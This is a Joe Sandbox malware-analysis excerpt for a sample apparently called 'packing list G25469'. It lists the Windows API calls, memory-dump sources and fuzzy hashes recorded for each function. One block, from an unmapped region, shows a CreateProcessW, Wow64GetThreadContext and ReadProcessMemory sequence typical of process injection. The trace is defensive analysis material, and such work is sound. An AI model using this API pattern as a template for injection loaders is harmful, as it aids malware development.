                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00B53973
                                                    • Part of subcall function 00B581C2: __NMSG_WRITE.LIBCMT ref: 00B581E9
                                                    • Part of subcall function 00B581C2: __NMSG_WRITE.LIBCMT ref: 00B581F3
                                                  • __NMSG_WRITE.LIBCMT ref: 00B5397A
                                                    • Part of subcall function 00B5821F: GetModuleFileNameW.KERNEL32(00000000,00BF0312,00000104,00000000,00000001,00000000), ref: 00B582B1
                                                    • Part of subcall function 00B5821F: ___crtMessageBoxW.LIBCMT ref: 00B5835F
                                                    • Part of subcall function 00B51145: ___crtCorExitProcess.LIBCMT ref: 00B5114B
                                                    • Part of subcall function 00B51145: ExitProcess.KERNEL32 ref: 00B51154
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  • RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000001,00000000,?,?,00B4F507,?,0000000E), ref: 00B5399F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 33e3d39f4a05c0cc0b44b97e803016c71a3cefd1feb86f4b9514b3f304640a4e
                                                  • Instruction ID: 70b14a5cd5ed91662875b93cd0dd1362ecd5eedea68ca191b1856eef67237512
                                                  • Opcode Fuzzy Hash: 33e3d39f4a05c0cc0b44b97e803016c71a3cefd1feb86f4b9514b3f304640a4e
                                                  • Instruction Fuzzy Hash: A1019B763456015AE6123B29EC5276D23C8DB81B92F2105E5FD06E7392DFF09D488660
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B7C385,?,?,?,?,?,00000004), ref: 00B7C6F2
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B7C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B7C708
                                                  • CloseHandle.KERNEL32(00000000,?,00B7C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B7C70F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: e04cf92691fd145d45eb5d369168a23901a45af5fae18e55ea87569257a96fe2
                                                  • Instruction ID: 497fa705834ed8b1f71a39dbb3f802f00c68cfc5ce7bc41e39599eb41a9a73e1
                                                  • Opcode Fuzzy Hash: e04cf92691fd145d45eb5d369168a23901a45af5fae18e55ea87569257a96fe2
                                                  • Instruction Fuzzy Hash: BDE08632140214BBD7211F58AC09FCA7F58EB05760F144214FB247A0E1ABF529118798
                                                  APIs
                                                  • _free.LIBCMT ref: 00B7BB72
                                                    • Part of subcall function 00B51C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00B57A85), ref: 00B51CB1
                                                    • Part of subcall function 00B51C9D: GetLastError.KERNEL32(00000000,?,00B57A85), ref: 00B51CC3
                                                  • _free.LIBCMT ref: 00B7BB83
                                                  • _free.LIBCMT ref: 00B7BB95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                  • Instruction ID: 6484ce5edcf9752d06848eee001a2fdd6f7eef4fa50107ae76f16de653ac156c
                                                  • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                  • Instruction Fuzzy Hash: 15E012A564174186DA24697D6E48FB313CCCF043527140CDEBC6DEB246CF24F8448DA4
                                                  APIs
                                                    • Part of subcall function 00B322A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B324F1), ref: 00B32303
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B325A1
                                                  • CoInitialize.OLE32(00000000), ref: 00B32618
                                                  • CloseHandle.KERNEL32(00000000), ref: 00BA503A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 3815369404-0
                                                  • Opcode ID: 18d87ebd6f85397cb540c73721951e6c4a50dd3ab53142e9037cefe24109b53b
                                                  • Instruction ID: f843b5f20072cb9ceb239a346142397c4599643ec5a97444f1416b62f8ae253a
                                                  • Opcode Fuzzy Hash: 18d87ebd6f85397cb540c73721951e6c4a50dd3ab53142e9037cefe24109b53b
                                                  • Instruction Fuzzy Hash: 8C7199B5901285DBC304EFAFA9914B9BBE8BBA83447904EAED109D7772DF314804CF19
                                                  APIs
                                                  • _strcat.LIBCMT ref: 00B908FD
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • _wcscpy.LIBCMT ref: 00B9098C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf_strcat_wcscpy
                                                  • String ID:
                                                  • API String ID: 1012013722-0
                                                  • Opcode ID: d69af452263cf114f09c2d2f63f163389f1c2234973c063b41d2a3fb5642c0ea
                                                  • Instruction ID: 90438ed9ec838196a3e252beeb7c960f8207666cf8ff16542edde6d4273d619c
                                                  • Opcode Fuzzy Hash: d69af452263cf114f09c2d2f63f163389f1c2234973c063b41d2a3fb5642c0ea
                                                  • Instruction Fuzzy Hash: 3D912874A10605DFCB18EF28C5D19A9B7E5FF59310B5580AAE81A8F3A2DB30ED45CF80
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00B33A73
                                                    • Part of subcall function 00B51405: __lock.LIBCMT ref: 00B5140B
                                                    • Part of subcall function 00B33ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B33AF3
                                                    • Part of subcall function 00B33ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B33B08
                                                    • Part of subcall function 00B33D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B33AA3,?), ref: 00B33D45
                                                    • Part of subcall function 00B33D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00B33AA3,?), ref: 00B33D57
                                                    • Part of subcall function 00B33D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BF1148,00BF1130,?,?,?,?,00B33AA3,?), ref: 00B33DC8
                                                    • Part of subcall function 00B33D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00B33AA3,?), ref: 00B33E48
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B33AB3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 924797094-0
                                                  • Opcode ID: dacb5f64cc0f0003a2a49c837ebfa7981984361b0bd9eefaf099844c8a53d395
                                                  • Instruction ID: 4a4a4e194045e96a94824f4791cf5d12c953f389b33b7f46f1918381ba42a145
                                                  • Opcode Fuzzy Hash: dacb5f64cc0f0003a2a49c837ebfa7981984361b0bd9eefaf099844c8a53d395
                                                  • Instruction Fuzzy Hash: C4119D71908341DBC300EF2AE845A2EBBE9EF94710F008D5EF485972A2DF709A45CF92
                                                  APIs
                                                  • ___lock_fhandle.LIBCMT ref: 00B5EA29
                                                  • __close_nolock.LIBCMT ref: 00B5EA42
                                                    • Part of subcall function 00B57BDA: __getptd_noexit.LIBCMT ref: 00B57BDA
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                  • String ID:
                                                  • API String ID: 1046115767-0
                                                  • Opcode ID: af371207990876b71410313f95057f053c06a631d9d8caee8f4a790954ffe36c
                                                  • Instruction ID: 5c59165332f976891819f5a56709924f32d02f6233329792d374186aaf2ff1c9
                                                  • Opcode Fuzzy Hash: af371207990876b71410313f95057f053c06a631d9d8caee8f4a790954ffe36c
                                                  • Instruction Fuzzy Hash: 191133729456509AE716BB78D8427587BD1AF82333F1643C0EC345F1E3DBB4CA488AA5
                                                  APIs
                                                    • Part of subcall function 00B5395C: __FF_MSGBANNER.LIBCMT ref: 00B53973
                                                    • Part of subcall function 00B5395C: __NMSG_WRITE.LIBCMT ref: 00B5397A
                                                    • Part of subcall function 00B5395C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000001,00000000,?,?,00B4F507,?,0000000E), ref: 00B5399F
                                                  • std::exception::exception.LIBCMT ref: 00B4F51E
                                                  • __CxxThrowException@8.LIBCMT ref: 00B4F533
                                                    • Part of subcall function 00B56805: RaiseException.KERNEL32(?,?,0000000E,00BE6A30,?,?,?,00B4F538,0000000E,00BE6A30,?,00000001), ref: 00B56856
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: df024714ff319bf6963e43849f0d93a3d97f543faa15c5d50a96be71c19db56b
                                                  • Instruction ID: 2377b2187aaef57e62082e7e08d2abc99b8fb555d8fd7272559acbef0d99d280
                                                  • Opcode Fuzzy Hash: df024714ff319bf6963e43849f0d93a3d97f543faa15c5d50a96be71c19db56b
                                                  • Instruction Fuzzy Hash: C0F0A43150421EA7D704BF98D801AFE77E89F00355F6044F5FE05A3181DFB0974496A5
                                                  APIs
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  • __lock_file.LIBCMT ref: 00B53629
                                                    • Part of subcall function 00B54E1C: __lock.LIBCMT ref: 00B54E3F
                                                  • __fclose_nolock.LIBCMT ref: 00B53634
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: de203b49f6739f7372c4a3f110ca510938e544483de49684da5d48150cb25e5c
                                                  • Instruction ID: aa0118a9d5a38ef0c7a2c15fa9f8031e584a6ef4b50e5c3bf7e2014c6b937ead
                                                  • Opcode Fuzzy Hash: de203b49f6739f7372c4a3f110ca510938e544483de49684da5d48150cb25e5c
                                                  • Instruction Fuzzy Hash: 63F0B431905204AAD7127B75880376E7BE0AF51B76F6581CCEC20AB3D1CB7C8B099F55
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 013491DB
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01349271
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01349293
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                  • Instruction ID: 1f207dab23ce8c1b644309fd458d141f949c315ca6f89dabe51ea51b097fa31e
                                                  • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                  • Instruction Fuzzy Hash: 1012ED20E24658C6EB24DF64D8507DEB272EF68304F1090E9910DEB7A4E77A5F81CF5A
                                                  APIs
                                                  • __flush.LIBCMT ref: 00B52A0B
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __flush__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 4101623367-0
                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                  • Instruction ID: af27598fd98a9614e5566b1310fd1f84291e35a09798a84c9140166f76ad7f7c
                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                  • Instruction Fuzzy Hash: 664171717027069BDF288F69C8817AE77E6EF46362B2485FDEC55C7240EA70DD498A40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: 9242f4b16f914cceb0e703d460cd1932faae7a67dde44ce4b47982fd02de8520
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 0F31B274A001059BD718DF58C4C0A69FBE6FF49340B6486E5E42ACB266DB31EEC1EB90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 66d70decd5a211264278599e794c5aae40b61e118244410e8e44cf8c873972f5
                                                  • Instruction ID: c77de9b5a05ca49107c5baad339b2224c7359f934916beba1e91987b0bb6f642
                                                  • Opcode Fuzzy Hash: 66d70decd5a211264278599e794c5aae40b61e118244410e8e44cf8c873972f5
                                                  • Instruction Fuzzy Hash: 1C316A75604528DFCF01AF14D0D066E7BF0EF59320F2184EAEA951B386DB74AA05DF92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 45c3e53b54bc3962fdf3437ac7cb1dc1720f9b4c06d82bd424fbfa428a5bfc38
                                                  • Instruction ID: 3ea9229b5623662385bf6bd40321ecdd3e11fa9107bbc7156539320298f17f81
                                                  • Opcode Fuzzy Hash: 45c3e53b54bc3962fdf3437ac7cb1dc1720f9b4c06d82bd424fbfa428a5bfc38
                                                  • Instruction Fuzzy Hash: C8414C745086118FDB24DF18C484B2ABBE0FF45304F1989ACE9964B362C772E985DF52
                                                  APIs
                                                    • Part of subcall function 00B34214: FreeLibrary.KERNEL32(00000000,?), ref: 00B34247
                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B339FE,?,00000001), ref: 00B341DB
                                                    • Part of subcall function 00B34291: FreeLibrary.KERNEL32(00000000), ref: 00B342C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load
                                                  • String ID:
                                                  • API String ID: 2391024519-0
                                                  • Opcode ID: 415812542a1e2a3aabb02f4ca9499bc63e8427e9421a5fa2566d6dd92cc4f674
                                                  • Instruction ID: ecbd9e452a85a2a622a888dd77b142fc2b5eacbbfcc066e9a44e066768a5b355
                                                  • Opcode Fuzzy Hash: 415812542a1e2a3aabb02f4ca9499bc63e8427e9421a5fa2566d6dd92cc4f674
                                                  • Instruction Fuzzy Hash: 3611A331610306ABDB10BF74DC56F9E77E99F40700F2084A9F996BA1C1EFB5EA049B60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 7c1a296f7036f65d495f985d73ed75c8887e4659678ab5fff8e60f33ccf3c089
                                                  • Instruction ID: 55d301b8903786da9570f0afb3d7486dcf88f7e2fcc74d1eb0e932ff981d593e
                                                  • Opcode Fuzzy Hash: 7c1a296f7036f65d495f985d73ed75c8887e4659678ab5fff8e60f33ccf3c089
                                                  • Instruction Fuzzy Hash: 39212674508601CFDB24EF68C484B2BBBE1FF85304F1549A8EA964B262D731E945DF52
                                                  APIs
                                                  • ___lock_fhandle.LIBCMT ref: 00B5AFC0
                                                    • Part of subcall function 00B57BDA: __getptd_noexit.LIBCMT ref: 00B57BDA
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                  • String ID:
                                                  • API String ID: 1144279405-0
                                                  • Opcode ID: 012be9014a8aed24deccda6c8b09f2e882f05c80c27c319461d2b42fea387cc3
                                                  • Instruction ID: abbc7ff1f8fa2bc198395100e3ec1c74efd9aa6ace491982301ba0bf18f36a81
                                                  • Opcode Fuzzy Hash: 012be9014a8aed24deccda6c8b09f2e882f05c80c27c319461d2b42fea387cc3
